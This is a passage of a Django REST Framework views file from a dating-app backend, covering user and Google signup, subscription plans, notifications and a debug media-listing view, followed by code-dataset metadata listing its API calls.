= self.request.data['gender']\n date_of_birth = self.request.data['date_of_birth']\n pic_1 = self.request.POST.get('pic_1' or None)\n pic_2 = self.request.POST.get('pic_2' or None)\n pic_3 = self.request.POST.get('pic_3' or None)\n pic_4 = self.request.POST.get('pic_4' or None)\n pic_5 = self.request.POST.get('pic_5' or None)\n pic_6 = self.request.POST.get('pic_6' or None)\n pic_7 = self.request.POST.get('pic_7' or None)\n pic_8 = self.request.POST.get('pic_8' or None)\n pic_9 = self.request.POST.get('pic_9' or None)\n user_email = RegisterUser.objects.filter(email=email).first()\n user_phone_number = RegisterUser.objects.filter(phone_number=phone_number).first()\n if user_email:\n return Response(\n {\"message\": \"User with this email already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n elif user_phone_number:\n return Response(\n {\"message\": \"User with this phone number already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n else:\n user = RegisterUser.objects.create(\n email=email,\n phone_number=phone_number,\n first_name=first_name,\n last_name=last_name,\n gender=gender,\n date_of_birth=date_of_birth,\n pic_1=pic_1,\n pic_2=pic_2,\n pic_3=pic_3,\n pic_4=pic_4,\n pic_5=pic_5,\n pic_6=pic_6,\n pic_7=pic_7,\n pic_8=pic_8,\n pic_9=pic_9,\n )\n user_detail = UserDetail.objects.create(\n phone_number=user\n )\n user_data = RegisterUser.objects.get(phone_number=phone_number)\n if user_data.pic_1:\n pic_1 = user_data.pic_1.url\n else:\n pic_1 = ''\n if user_data.pic_2:\n pic_2 = user_data.pic_2.url\n else:\n pic_2 = ''\n if user_data.pic_3:\n pic_3 = user_data.pic_3.url\n else:\n pic_3 = ''\n if user_data.pic_4:\n pic_4 = user_data.pic_4.url\n else:\n pic_4 = ''\n if user_data.pic_5:\n pic_5 = user_data.pic_5.url\n else:\n pic_5 = ''\n if user_data.pic_6:\n pic_6 = user_data.pic_6.url\n else:\n pic_6 = ''\n if user_data.pic_8:\n pic_8 = user_data.pic_8.url\n else:\n pic_8 = ''\n if user_data.pic_9:\n pic_9 = user_data.pic_9.url\n else:\n pic_9 = ''\n Data = {\n \"id\": user_data.id,\n \"email\": user_data.email,\n \"first_name\": user_data.first_name,\n \"last_name\": user_data.last_name,\n \"phone_number\": user_data.phone_number,\n \"gender\": user_data.gender,\n \"date_of_birth\": user_data.date_of_birth,\n \"job_profile\": user_data.job_profile,\n \"company_name\": user_data.company_name,\n \"qualification\": user_data.qualification,\n \"relationship_status\": user_data.relationship_status,\n \"interests\": user_data.interests,\n \"fav_quote\": user_data.fav_quote,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n }\n return Response({\"User\": \"User Created successfully\", \"Data\": Data, \"status\": HTTP_200_OK, \"flag\": 1})\n\n\nclass GoogleSignupView(CreateAPIView):\n serializer_class = SocialUserSerializer\n\n def post(self, request, *args, **kwargs):\n email = self.request.POST.get('email' or None)\n phone_number = self.request.POST.get('phone_number' or None)\n first_name = self.request.data['first_name']\n last_name = self.request.data['last_name']\n gender = self.request.data['gender']\n date_of_birth = self.request.data['date_of_birth']\n pic_1 = self.request.POST.get('pic_1' or None)\n pic_2 = self.request.POST.get('pic_2' or None)\n pic_3 = self.request.POST.get('pic_3' or None)\n pic_4 = self.request.POST.get('pic_4' or None)\n pic_5 = self.request.POST.get('pic_5' or None)\n pic_6 = self.request.POST.get('pic_6' or None)\n pic_7 = 
self.request.POST.get('pic_7' or None)\n pic_8 = self.request.POST.get('pic_8' or None)\n pic_9 = self.request.POST.get('pic_9' or None)\n user_email = RegisterUser.objects.filter(email=email).first()\n user_phone_number = RegisterUser.objects.filter(phone_number=phone_number).first()\n if user_email:\n return Response(\n {\"message\": \"User with this email already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n elif user_phone_number:\n return Response(\n {\"message\": \"User with this phone number already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n else:\n user = RegisterUser.objects.create(\n email=email,\n phone_number=phone_number,\n first_name=first_name,\n last_name=last_name,\n gender=gender,\n date_of_birth=date_of_birth,\n pic_1=pic_1,\n pic_2=pic_2,\n pic_3=pic_3,\n pic_4=pic_4,\n pic_5=pic_5,\n pic_6=pic_6,\n pic_7=pic_7,\n pic_8=pic_8,\n pic_9=pic_9,\n )\n user_detail = UserDetail.objects.create(\n phone_number=user\n )\n user_data = RegisterUser.objects.get(phone_number=phone_number)\n if user_data.pic_1:\n pic_1 = user_data.pic_1.url\n else:\n pic_1 = ''\n if user_data.pic_2:\n pic_2 = user_data.pic_2.url\n else:\n pic_2 = ''\n if user_data.pic_3:\n pic_3 = user_data.pic_3.url\n else:\n pic_3 = ''\n if user_data.pic_4:\n pic_4 = user_data.pic_4.url\n else:\n pic_4 = ''\n if user_data.pic_5:\n pic_5 = user_data.pic_5.url\n else:\n pic_5 = ''\n if user_data.pic_6:\n pic_6 = user_data.pic_6.url\n else:\n pic_6 = ''\n if user_data.pic_8:\n pic_8 = user_data.pic_8.url\n else:\n pic_8 = ''\n if user_data.pic_9:\n pic_9 = user_data.pic_9.url\n else:\n pic_9 = ''\n Data = {\n \"id\": user_data.id,\n \"email\": user_data.email,\n \"first_name\": user_data.first_name,\n \"last_name\": user_data.last_name,\n \"phone_number\": user_data.phone_number,\n \"gender\": user_data.gender,\n \"date_of_birth\": user_data.date_of_birth,\n \"job_profile\": user_data.job_profile,\n \"company_name\": user_data.company_name,\n \"qualification\": user_data.qualification,\n \"relationship_status\": user_data.relationship_status,\n \"interests\": user_data.interests,\n \"fav_quote\": user_data.fav_quote,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n }\n return Response({\"User\": \"User Created successfully\", \"Data\": Data, \"status\": HTTP_200_OK, \"flag\": 1})\n\n\nclass PopNotificationAPIView(CreateAPIView):\n serializer_class = PopUpNotificationSerializer\n\n def post(self, request, *args, **kwargs):\n return Response({\"You have updated your meeting status successfully\"}, status=HTTP_200_OK)\n\n\nclass SubscriptionPlanAPIView(ListAPIView):\n serializer_class = SubscriptionPlanSerializer\n queryset = SubscriptionPlans.objects.all()\n\n # def get(self, request, *args, **kwargs):\n # queryset = SubscriptionPlans.objects.all().values()\n # return Response(queryset)\n #\n # def post(self, request, *args, **kwargs):\n # return Response({\"You have updated your meeting request successfully\"}, status=HTTP_200_OK)\n\n\n# class GetScheduledMeeting(APIView):\n#\n# def get(self, request, *args, **kwargs):\n# liked_obj = MatchedUser.objects.filter(matched='Yes')\n# for obj in liked_obj:\n# print('<<<<<--------->>>>', obj.user)\n# print('--------->>>>', obj.liked_by_me.all()[0])\n# liked_by = RegisterUser.objects.get(id=obj.user.id)\n# liked_user = RegisterUser.objects.get(id=obj.liked_by_me.all()[0].id)\n# print('...........................', obj.matched_at.date())\n# 
print('>>>>>>>>>>>>>>>', liked_by.first_name)\n# print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<,', liked_user.first_name)\n# schedule_obj = ScheduleMeeting.objects.filter(\n# Q(scheduled_by__exact=obj.user.id) & Q(scheduled_with__exact=obj.liked_by_me.all()[0].id) & Q(\n# status__icontains='Not Completed')).values()\n# if schedule_obj:\n# for s_obj in schedule_obj:\n# meeting_at = s_obj['created_at']\n# m_date = str(meeting_at.date()).split('-')\n# meeting_year = int(m_date[0])\n# meeting_month = int(m_date[1])\n# meeting_date = int(m_date[2])\n# meeting_at = date(meeting_year, meeting_month, meeting_date)\n# matched_at = str(obj.matched_at.date()).split('-')\n# matched_year = int(matched_at[0])\n# matched_month = int(matched_at[1])\n# matched_date = int(matched_at[2])\n# matched_at = date(matched_year, matched_month, matched_date)\n# delta = matched_at - meeting_at\n# print(delta.days)\n# if delta.days > 30:\n# obj.delete()\n# return Response({\"Objects\": schedule_obj}, status=HTTP_200_OK)\n\n\nclass GetMediaContent(APIView):\n def get(self, request, *args, **kwargs):\n # os.path.isdir(\"media\")\n # os.chdir(\"media\")\n for path, dirs, files in os.walk(\"media\"):\n for filename in files:\n print(os.path.join(path, filename))\n for f in os.listdir(\"media\"):\n print('------>>>')\n print(f)\n return Response({\"sdgfsgjas\"})\n", "sub_path": "Desktop/Maclo-datingapp-gitlab/datting-app_backend/src/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 62102, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 25, "usage_type": "call"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 29, "usage_type": "name"}, {"api_name": "serializers.RegisterSerializer", "line_number": 30, "usage_type": "name"}, {"api_name": "serializers.RegisterSerializer", "line_number": 33, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects.filter", "line_number": 57, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 57, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 62, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.create", "line_number": 64, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 64, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.create", "line_number": 89, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 89, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 154, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 155, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 28, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", 
"line_number": 28, "usage_type": "argument"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 178, "usage_type": "name"}, {"api_name": "serializers.RegisterSerializer", "line_number": 179, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.all", "line_number": 180, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 180, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 188, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 188, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 188, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 191, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 191, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 191, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 194, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 194, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 195, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 195, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 195, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 204, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 204, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 208, "usage_type": "name"}, {"api_name": "models.UserDetail", "line_number": 209, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 210, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.get", "line_number": 214, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 214, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 214, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 299, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 299, "usage_type": "argument"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 207, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 207, "usage_type": "argument"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 302, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 303, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.all", "line_number": 304, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 304, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 304, "usage_type": "name"}, {"api_name": "models.SubscriptionPlans.objects.get", "line_number": 334, "usage_type": "call"}, {"api_name": "models.SubscriptionPlans.objects", "line_number": 334, "usage_type": "attribute"}, {"api_name": "models.SubscriptionPlans", "line_number": 334, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 343, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 343, 
"usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 343, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 346, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 346, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 346, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 349, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 349, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 349, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 350, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 350, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 350, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 360, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 360, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 363, "usage_type": "name"}, {"api_name": "serializers.GetInstagramPicSerializer", "line_number": 364, "usage_type": "name"}, {"api_name": "instaloader.Instaloader", "line_number": 369, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 377, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 377, "usage_type": "name"}, {"api_name": "instaloader.Profile.from_username", "line_number": 378, "usage_type": "call"}, {"api_name": "instaloader.Profile", "line_number": 378, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 388, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path", "line_number": 394, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 395, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 397, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 398, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 402, "usage_type": "name"}, {"api_name": "serializers.UserInstagramSerializer", "line_number": 403, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 407, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 407, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 407, "usage_type": "name"}, {"api_name": "models.UserInstagramPic.objects.create", "line_number": 418, "usage_type": "call"}, {"api_name": "models.UserInstagramPic.objects", "line_number": 418, "usage_type": "attribute"}, {"api_name": "models.UserInstagramPic", "line_number": 418, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 432, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 433, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 401, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 401, "usage_type": "argument"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 436, "usage_type": "name"}, {"api_name": "serializers.ShowInstaPics", "line_number": 437, "usage_type": "name"}, {"api_name": 
"models.UserInstagramPic.objects.get", "line_number": 442, "usage_type": "call"}, {"api_name": "models.UserInstagramPic.objects", "line_number": 442, "usage_type": "attribute"}, {"api_name": "models.UserInstagramPic", "line_number": 442, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 466, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 466, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 468, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 471, "usage_type": "name"}, {"api_name": "models.UserDetail", "line_number": 472, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 473, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.all", "line_number": 483, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 483, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 483, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.all", "line_number": 484, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 484, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 484, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 605, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 605, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 607, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 607, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 610, "usage_type": "name"}, {"api_name": "models.UserDetail", "line_number": 611, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 612, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.filter", "line_number": 617, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 617, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 617, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 627, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 627, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 746, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 746, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 747, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 747, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.FilterSet", "line_number": 750, "usage_type": "attribute"}, {"api_name": "django_filters.rest_framework", "line_number": 750, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 751, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 751, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 752, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 752, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 753, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", 
"line_number": 753, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 754, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 754, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 755, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 755, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 756, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 756, "usage_type": "name"}, {"api_name": "models.RegisterUser", "line_number": 759, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 807, "usage_type": "name"}, {"api_name": "serializers.SearchSerializer", "line_number": 808, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.filter", "line_number": 826, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 826, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 826, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 826, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 827, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 828, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 829, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 830, "usage_type": "call"}, {"api_name": "django.db.models.Q", "line_number": 831, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 833, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 833, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 837, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 838, "usage_type": "name"}, {"api_name": "serializers.LikeSerializer", "line_number": 839, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 843, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 843, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 843, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 852, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 852, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 852, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 854, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 854, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 854, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 856, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 856, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 856, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 858, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 858, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 858, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 867, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 867, 
"usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 870, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 870, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 870, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 872, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 872, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 872, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 875, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 875, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 875, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 877, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 877, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 877, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 886, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 886, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 836, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 836, "usage_type": "argument"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 890, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 891, "usage_type": "name"}, {"api_name": "serializers.SuperLikeSerializer", "line_number": 892, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 896, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 896, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 896, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 904, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 904, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 904, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.create", "line_number": 906, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 906, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 906, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 909, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 909, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 909, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 911, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 911, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 911, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 920, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 920, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 923, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 923, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 923, "usage_type": "name"}, {"api_name": 
"models.MatchedUser.objects.create", "line_number": 925, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 925, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 925, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 928, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 928, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 928, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 930, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 930, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 930, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 939, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 939, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 889, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 889, "usage_type": "argument"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 942, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 943, "usage_type": "name"}, {"api_name": "serializers.MatchedUserSerializer", "line_number": 944, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 948, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 948, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 948, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 951, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 951, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 951, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 957, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 957, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 957, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 959, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 959, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 959, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 972, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 972, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 976, "usage_type": "name"}, {"api_name": "models.MatchedUser", "line_number": 977, "usage_type": "name"}, {"api_name": "serializers.DeleteMatchSerializer", "line_number": 978, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 982, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 982, "usage_type": "attribute"}, {"api_name": "models.MatchedUser", "line_number": 982, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 984, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 984, "usage_type": "name"}, {"api_name": "models.MatchedUser.objects.filter", "line_number": 990, "usage_type": "call"}, {"api_name": "models.MatchedUser.objects", "line_number": 990, "usage_type": 
